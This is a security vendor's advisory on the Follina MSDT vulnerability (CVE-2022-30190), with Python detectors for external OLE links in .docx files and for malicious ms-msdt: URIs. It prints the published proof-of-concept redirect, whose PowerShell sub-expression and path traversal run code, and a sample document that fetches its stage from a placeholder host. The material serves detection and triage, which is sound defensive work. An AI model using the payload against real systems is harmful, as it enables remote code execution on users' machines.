UPDATE: This vulnerability has now been assigned CVE-2022-30190 and Microsoft has issued guidance; see the reference below.
Application Details
MSDT (Microsoft Support Diagnostic Tool, msdt.exe) invokes a troubleshooting pack from the command line or as part of an automated script, and can enable additional options without user input. It is also registered as the handler for the ms-msdt: URI scheme, which is the entry point this exploit abuses.
Vulnerability
The Japanese security research group nao_sec (@nao_sec) reported on Twitter that they had discovered a zero-day exploit inside a malicious Word document. The document uses an external OLE object relationship to fetch an HTML file from a remote web server; that page then navigates to an ms-msdt: URI, which passes attacker-controlled parameters to the MSDT protocol handler and results in code execution. Security researcher Kevin Beaumont confirmed that the exploit works even with Office macros disabled and named it "Follina", because the sample referenced 0438, the telephone area code of Follina in Italy. As more research is carried out on this exploit we are seeing different payloads being used, and we will update our information as necessary.
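The delivery side can be triaged without opening the document, because the remote HTML stage is referenced from the document's relationship parts inside the .docx zip. The following is an added example, not code from the original article or from any of the researchers named above: it walks every .rels part, flags oleObject relationships with TargetMode="External" (the Follina delivery), and, as a generalisation beyond this page, also flags external attachedTemplate relationships, which remote-template injection abuses in the same way. The sample documents are constructed in the script (minimal zip files shaped like a docx, not real Word output) and the payload.example host is a placeholder.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
TEMPLATE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

# Relationship types that legitimately point at local parts but become a remote
# fetch when TargetMode="External". oleObject is the Follina path; attachedTemplate
# is the older remote-template trick and is included here as a generalisation.
REMOTE_REL_TYPES = {OLE_REL_TYPE: "oleObject", TEMPLATE_REL_TYPE: "attachedTemplate"}


def external_relationships(docx_bytes):
    """Return every external oleObject/attachedTemplate relationship in a docx blob."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                kind = REMOTE_REL_TYPES.get(rel.get("Type"))
                if kind is None or rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target") or ""
                hits.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "kind": kind,
                    "target": target,
                    # http(s) or UNC targets mean the document phones home on open
                    "remote": target.lower().startswith(("http://", "https://", "\\\\")),
                })
    return hits


def build_sample_docx(extra_rel=""):
    """Construct a minimal docx-shaped zip for demonstration (constructed, not a real Word file)."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        + extra_rel
        + "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Constructed inputs: a clean document and one carrying a Follina-style external OLE link.
BENIGN_DOCX = build_sample_docx()
MALICIOUS_DOCX = build_sample_docx(
    f'<Relationship Id="rId996" Type="{OLE_REL_TYPE}" '
    'Target="http://payload.example/stage.html" TargetMode="External"/>'
)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_DOCX), ("malicious", MALICIOUS_DOCX)):
        print(label, external_relationships(blob))
```

In practice run external_relationships over the raw bytes of the attachment and treat any hit with remote set as a detonation candidate; an external oleObject target is rare in legitimate documents.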
Identification
This is an example of a PoC which has been published and contains characteristics similar to others that we have seen. The HTML page opens with a comment of at least 4096 characters (padding that is needed for the ms-msdt: navigation to fire), followed by a script that redirects the browser control to the ms-msdt: URI:
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (4096 characters or more)
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
Detection
We have created a traffic file that replays the delivery of the HTML stage and a corresponding rule, so that attempts to perform remote code execution against an affected system in this way can be detected. Because the exploit is delivered over the network as an HTML page, the ms-msdt: URI and its parameters in the HTTP response are the natural place to match.
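To show what a content-level check on the HTML stage looks like, here is an added example covering both the PoC in the Identification section and the detection point above; it is not Idappcom's rule or traffic file, and the sample page it scans is constructed in the same shape as the published PoC rather than captured traffic. It pulls ms-msdt: URIs out of JavaScript string literals (after undoing HTML-entity and percent-encoding a variant might use to hide the scheme), splits the URI into its /id, /skip and /param switches and the IT_* parameters, and reports the traits that separate this payload from a legitimate troubleshooter launch: the PCWDiagnostic pack, /skip force, a PowerShell $( ) sub-expression and Invoke-Expression in IT_BrowseForFile, the ../ traversal, and the oversized comment.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample page in the shape of the published PoC (not a captured sample):
# a comment of more than 4096 bytes, then a redirect to an ms-msdt: URI.
SAMPLE_HTML = (
    "<!doctype html><html><body><script>\n"
    "//" + "A" * 4200 + "\n"
    'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    '\\"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed '
    "IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../"
    'Windows/System32/mpsigstub.exe \\"";\n'
    "</script></body></html>"
)
# Same page with every quote and angle bracket entity-encoded, a cheap evasion.
ENTITY_ENCODED_SAMPLE = html.escape(SAMPLE_HTML)

# A JS string literal (single- or double-quoted) starting with the ms-msdt: scheme.
# Backslash escapes are consumed as pairs so an escaped quote does not end the match.
JS_MSDT_STRING = re.compile(r"""(["'])(ms-msdt:(?:\\.|(?!\1)[^\\])*)\1""", re.IGNORECASE)
URI_SWITCHES = re.compile(
    r'/id\s+(?P<id>\S+)|/skip\s+(?P<skip>\S+)|/param\s+"(?P<param>[^"]*)"', re.IGNORECASE)
PARAM_KV = re.compile(r"(IT_\w+)=(.*?)(?=\s+IT_\w+=|\s*$)", re.DOTALL)


def extract_msdt_uris(page):
    """Return ms-msdt: URIs found in JS string literals, after undoing HTML-entity
    and percent-encoding, with the JS quote escapes removed."""
    text = unquote(html.unescape(page))
    return [m.group(2).replace('\\"', '"').replace("\\'", "'")
            for m in JS_MSDT_STRING.finditer(text)]


def analyse_msdt_uri(uri):
    """Split an ms-msdt: URI into switches and IT_* parameters and list indicators."""
    body = uri.split(":", 1)[1]
    info = {"id": None, "skip": None, "params": {}, "indicators": []}
    for m in URI_SWITCHES.finditer(body):
        if m.group("id"):
            info["id"] = m.group("id")
        elif m.group("skip"):
            info["skip"] = m.group("skip")
        elif m.group("param") is not None:
            info["params"].update(PARAM_KV.findall(m.group("param")))
    browse = info["params"].get("IT_BrowseForFile", "")
    if (info["id"] or "").lower() == "pcwdiagnostic":
        info["indicators"].append("pcwdiagnostic_pack")
    if (info["skip"] or "").lower() == "force":
        info["indicators"].append("skip_force")
    if "$(" in browse:                      # PowerShell sub-expression in a file-path field
        info["indicators"].append("powershell_subexpression")
    if re.search(r"\b(iex|invoke-expression)\b", browse, re.IGNORECASE):
        info["indicators"].append("invoke_expression")
    if "../" in browse or "..\\" in browse:  # traversal to a real file so the pack accepts it
        info["indicators"].append("path_traversal")
    return info


def has_padding_comment(page, minimum=4096):
    """True if any // comment line is at least `minimum` characters long."""
    return any(len(line) >= minimum
               for line in page.splitlines() if line.lstrip().startswith("//"))


def scan_page(page):
    """Top-level check: one finding per ms-msdt: URI on the page, with a verdict."""
    findings = []
    for uri in extract_msdt_uris(page):
        info = analyse_msdt_uri(uri)
        info["uri"] = uri
        info["padding_comment"] = has_padding_comment(page)
        strong = {"powershell_subexpression", "path_traversal"} & set(info["indicators"])
        info["verdict"] = "malicious" if strong else "suspicious"
        findings.append(info)
    return findings


if __name__ == "__main__":
    for finding in scan_page(SAMPLE_HTML):
        print(finding["verdict"], finding["id"], finding["indicators"])
```

Any ms-msdt: URI arriving in an HTTP response body to a Word client is already worth an alert; the indicator list is there so the verdict survives trivial changes such as a different diagnostic pack or a renamed target executable.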
Coverage
Idappcom has created signature 8022755 along with a traffic file.
References
Traffic IQ
If you are concerned that your business may be at risk from this vulnerability or others, why not try out our Traffic IQ software, which can test your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional